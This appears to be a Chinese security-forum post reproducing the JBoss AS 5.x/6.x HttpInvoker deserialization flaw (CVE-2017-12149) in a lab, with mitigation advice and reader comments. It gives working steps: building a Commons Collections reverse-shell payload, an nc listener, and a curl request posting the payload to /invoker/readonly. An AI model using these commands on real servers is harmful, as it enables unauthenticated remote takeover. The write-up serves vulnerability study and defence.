用户
搜索
  • TA的每日心情
    慵懒
    6 天前
  • 签到天数: 163 天

    连续签到: 1 天

    [LV.7]常住居民III

    i春秋作家

    推荐小组副组长

    Rank: 7Rank: 7Rank: 7

    61

    主题

    171

    帖子

    531

    魔法币
    收听
    2
    粉丝
    4
    注册时间
    2017-12-4

    i春秋认证秦幽默灌水王突出贡献春秋文阁积极活跃奖核心白帽i春秋签约作者i春秋推荐小组楚

    夜莺 i春秋作家 推荐小组副组长 i春秋认证 秦 幽默灌水王 突出贡献 春秋文阁 积极活跃奖 核心白帽 i春秋签约作者 楼主
    发表于 2018-2-2 15:50:19 139069
    本帖最后由 夜莺 于 2018-2-6 09:24 编辑

      
    一、漏洞说明

      JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用,2006年,JBoss被Redhat公司收购。
    2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

    二、影响范围
      5.x和6.x版本的JBOSSAS

    三、漏洞防护建议
      有效解决方案:升级到JBOSS AS7版本临时解决方案:
      1、不需要 http-invoker.sar 组件的用户可直接删除此组件;
      2、用于对 http invoker 组件进行访问控制。

    四、漏洞复现实验环境:

      测试平台:Windows
      测试环境:JBOSS

      测试工具:Kali Linux
      服务器IP:172.16.4.144
      攻击机IP:172.16.4.116

          环境搭建:   
      注:安装JBOSS之前先要安装JAVA环境,并配置好环境变量
    下载jboss-6.1.0.Final压缩包并解压安装,并配置环境变量。
       (这里就不赘述JBOSS安装过程了,自行百度,我自己也被坑了一下)

      找到server.xml文件(各个版本的JBOSS文件位置可能不一样)

    1.png
      修改以下部分
    1.png

      找到run.bat文件,启动服务
    1.png

    出现下面提示,说明JBOSS服务启动成功
    1.png

      如果一切正常的话,访问网站。(http://172.16.4.144:8080
       1.png

      这下完成我们目标的环境搭建,下一步我们准备我们的攻击工具,也就是kali linux,它也需要准备以下环境。

    1、首先,在GitHub上下载我们需要的对应的POC:
    2、在Kali中下载执行生成二进制的payload文件。
    java-cp:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java  
    1.png


    3、修改接受shell的主机IP和端口
    java-cp.:commons-collections-3.2.1.jarReverseShellCommonsCollectionsHashMap 172.16.4.116:4444


    1.png

    4、新建一个终端,进行监听nc -vv -l -p  4444   
    1.png


    5、Curl向被攻击服务器发送攻击Payload。
    curl http://172.16.4.144:8080/invoker/readonly--data-binary @ReverseShellCommonsCollectionsHashMap.ser
    1.png

    6、测试结果。
    1.png

    总结:网络上大多数是采用是Windows作攻击机完成漏洞复现,这里我是把我自己用kali Linux作为攻击机完成实验过程分享给大家,希望大家有什么不足之处,多多指教。

    低调求发展,潜心学安全 个人博客www.shallowdream.cn
    见过windows的工具,学习了!
    使用道具 举报 回复
    写个python的poc或exp跨平台多好
    使用道具 举报 回复
    表哥 可以说下原理不

    使用道具 举报 回复
    发表于 2018-2-4 21:38:04
    谢谢,学习了
    使用道具 举报 回复
    发表于 2018-2-5 09:46:42

    互相学习互相学习
    低调求发展,潜心学安全 个人博客www.shallowdream.cn
    使用道具 举报 回复
    发表于 2018-2-5 09:46:57
    TO路人甲 发表于 2018-2-4 07:12
    表哥 可以说下原理不

    反序列化
    低调求发展,潜心学安全 个人博客www.shallowdream.cn
    使用道具 举报 回复
    发表于 2018-2-5 09:47:15
    shadow15 发表于 2018-2-4 00:05
    写个python的poc或exp跨平台多好

    python还不是很熟练
    低调求发展,潜心学安全 个人博客www.shallowdream.cn
    使用道具 举报 回复
    发表于 2018-2-5 10:23:10
    正在搜集cve 学习了
    使用道具 举报 回复
    发表于 2018-2-6 01:09:55
    哀 .... 是CVE-2017-12149
    使用道具 举报 回复
    发表于 2018-2-6 09:24:58
    hacklikepro 发表于 2018-2-6 01:09
    哀 .... 是CVE-2017-12149

    撰稿错误,感谢表哥指正
    低调求发展,潜心学安全 个人博客www.shallowdream.cn
    使用道具 举报 回复
    发表于 2018-3-3 16:18:32
    zhutouge 发表于 2018-2-2 21:52
    见过windows的工具,学习了!

    工具能发给我吗?
    使用道具 举报 回复
    发表于 2018-5-2 08:53:58
    公子盛 发表于 2018-3-3 16:18
    工具能发给我吗?

    可以,私聊个联系方式!
    使用道具 举报 回复
    发表于 2018-10-6 07:55:00
    支持一下~
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册